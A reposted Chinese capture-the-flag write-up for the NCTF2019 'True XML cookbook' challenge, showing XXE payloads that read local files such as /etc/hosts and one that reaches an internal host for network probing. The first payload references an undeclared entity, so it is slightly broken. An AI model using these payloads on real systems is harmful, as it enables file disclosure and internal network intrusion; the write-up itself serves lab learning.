码上快乐

相关内容   简体   繁体

[NCTF2019]True XML cookbook

本文转载自  查看原文  2020-11-15 17:37  364    CTF

[NCTF2019]True XML cookbook

爆破

抓包爆破,想直接爆出密码。
然鹅我天真了。

XXE漏洞

这里存在XXE漏洞,利用脚本直接打:
构造:

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM  "file:///flag">
]>
<user>
  <username>&admin;</username>
  <password>password</password>
</user>

在这里插入图片描述

没有哦·····

打内网

XXE漏洞可以直接攻击内网用户,先查看内网存活主机:

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM  "file:///etc/hosts">
]>
<user>
  <username>&file;</username>
  <password>password</password>
</user>

在这里插入图片描述
看到了本机ip,但是不知道存活ip。
可以用BP爆破(但是看到wp上是说ip最后一位为11):

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM  "http://10.34.239.11">
]>
<user>
  <username>&file;</username>
  <password>password</password>
</user>

在这里插入图片描述


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 [NCTF2019]True XML cookbook [NCTF2019]Fake XML cookbook XXE漏洞学习和利用—[NCTF2019]Fake XML cookbook NCTF2019 Keyboard [NCTF2019]SQLi [NCTF2019]SQLi [NCTF2019]babyRSA [NCTF2019]SQLi 【Yii2-CookBook】JSON 和 XML 输出 web.xml is missing and is set to true
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM